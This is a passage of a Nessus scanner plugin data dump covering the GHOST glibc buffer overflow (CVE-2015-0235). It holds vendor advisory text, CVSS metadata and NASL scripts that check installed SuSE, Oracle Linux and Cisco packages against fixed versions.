reference:\"glibc-info-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"glibc-locale-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"glibc-profile-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"nscd-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"glibc-32bit-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"glibc-devel-32bit-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"glibc-locale-32bit-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"glibc-profile-32bit-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"glibc-32bit-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.11.1-0.60.1\")) flag++;\n\n# 11.2\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"glibc-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"glibc-devel-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"glibc-html-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"glibc-i18ndata-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"glibc-info-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"glibc-locale-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"glibc-profile-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"nscd-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"s390x\", reference:\"glibc-32bit-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"s390x\", reference:\"glibc-devel-32bit-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"s390x\", reference:\"glibc-locale-32bit-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"s390x\", reference:\"glibc-profile-32bit-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"x86_64\", reference:\"glibc-32bit-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.11.3-17.45.55.5\")) flag++;\n\n# 11.3\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"glibc-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"glibc-devel-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"glibc-i18ndata-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"glibc-locale-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"nscd-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i686\", reference:\"glibc-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i686\", reference:\"glibc-devel-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-devel-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-i18ndata-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-locale-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"nscd-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-devel-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-html-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-i18ndata-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-info-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-locale-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-profile-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"nscd-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"glibc-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"glibc-devel-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"glibc-locale-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"glibc-profile-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"glibc-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.11.3-17.74.13\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:46:47", "description": "From Red Hat Security Advisory 2015:0101 :\n\nUpdated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 4 Extended Life Cycle Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2015-01-30T00:00:00", "type": "nessus", "title": "Oracle Linux 4 : glibc (ELSA-2015-0101) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:glibc", "p-cpe:/a:oracle:linux:glibc-common", "p-cpe:/a:oracle:linux:glibc-devel", "p-cpe:/a:oracle:linux:glibc-headers", "p-cpe:/a:oracle:linux:glibc-profile", "p-cpe:/a:oracle:linux:glibc-utils", "p-cpe:/a:oracle:linux:nptl-devel", "p-cpe:/a:oracle:linux:nscd", "cpe:/o:oracle:linux:4"], "id": "ORACLELINUX_ELSA-2015-0101.NASL", "href": "https://www.tenable.com/plugins/nessus/81099", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:0101 and \n# Oracle Linux Security Advisory ELSA-2015-0101 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81099);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"RHSA\", value:\"2015:0101\");\n\n script_name(english:\"Oracle Linux 4 : glibc (ELSA-2015-0101) (GHOST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:0101 :\n\nUpdated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 4 Extended Life Cycle Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-January/004827.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nptl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/30\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"glibc-2.3.4-2.57.0.1.el4.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-common-2.3.4-2.57.0.1.el4.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-devel-2.3.4-2.57.0.1.el4.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-headers-2.3.4-2.57.0.1.el4.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-profile-2.3.4-2.57.0.1.el4.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-utils-2.3.4-2.57.0.1.el4.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"nptl-devel-2.3.4-2.57.0.1.el4.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"nscd-2.3.4-2.57.0.1.el4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-profile / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:49:15", "description": "This update for glibc fixes the following security issue :\n\n - A vulnerability was found and fixed in the GNU C Library, specifically in the function gethostbyname(), that can lead to a local or remote buffer overflow.\n (bsc#913646). (CVE-2015-0235)", "cvss3": {}, "published": "2015-02-02T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : glibc (ZYPP Patch Number 9035)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:10:glibc", "p-cpe:/a:novell:suse_linux:10:glibc-32bit", "p-cpe:/a:novell:suse_linux:10:glibc-devel", "p-cpe:/a:novell:suse_linux:10:glibc-devel-32bit", "p-cpe:/a:novell:suse_linux:10:glibc-html", "p-cpe:/a:novell:suse_linux:10:glibc-i18ndata", "p-cpe:/a:novell:suse_linux:10:glibc-info", "p-cpe:/a:novell:suse_linux:10:glibc-locale", "p-cpe:/a:novell:suse_linux:10:glibc-locale-32bit", "p-cpe:/a:novell:suse_linux:10:glibc-profile", "p-cpe:/a:novell:suse_linux:10:glibc-profile-32bit", "p-cpe:/a:novell:suse_linux:10:nscd", "cpe:/o:novell:suse_linux:10"], "id": "SUSE_GLIBC-9035.NASL", "href": "https://www.tenable.com/plugins/nessus/81125", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81125);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"SuSE 10 Security Update : glibc (ZYPP Patch Number 9035)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for glibc fixes the following security issue :\n\n - A vulnerability was found and fixed in the GNU C\n Library, specifically in the function gethostbyname(),\n that can lead to a local or remote buffer overflow.\n (bsc#913646). (CVE-2015-0235)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=913646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0235.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 9035.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-locale-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-profile-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^SLES10\") audit(AUDIT_OS_NOT, \"SuSE 10\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 10\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"glibc-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"glibc-devel-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"glibc-html-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"glibc-i18ndata-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"glibc-info-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"glibc-locale-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"glibc-profile-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"nscd-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"glibc-32bit-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.4-31.113.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-17T14:22:31", "description": "The version of Cisco NX-OS software running on the remote device is affected by a remote code execution vulnerability known as GHOST. A heap-based buffer overflow condition exists in the GNU C Library (glibc) due to improper validation of user-supplied input to the glibc functions __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2(). An unauthenticated, remote attacker can exploit this to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.", "cvss3": {}, "published": "2016-07-19T00:00:00", "type": "nessus", "title": "Cisco NX-OS GNU C Library (glibc) Buffer Overflow (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2019-11-14T00:00:00", "cpe": ["cpe:/o:cisco:nx-os"], "id": "CISCO-SA-20150128-GHOST-NXOS.NASL", "href": "https://www.tenable.com/plugins/nessus/92412", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(92412);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/14\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus71708\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus68770\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus69648\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus68591\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus68892\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20150128-ghost\");\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"Cisco NX-OS GNU C Library (glibc) Buffer Overflow (GHOST)\");\n script_summary(english:\"Checks the NX-OS version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Cisco NX-OS software running on the remote device is\naffected by a remote code execution vulnerability known as GHOST. A\nheap-based buffer overflow condition exists in the GNU C Library\n(glibc) due to improper validation of user-supplied input to the glibc\nfunctions __nss_hostname_digits_dots(), gethostbyname(), and\ngethostbyname2(). An unauthenticated, remote attacker can exploit this\nto cause a buffer overflow, resulting in a denial of service condition\nor the execution of arbitrary code.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fd2144f8\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in the vendor\nadvisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/19\");\n\n 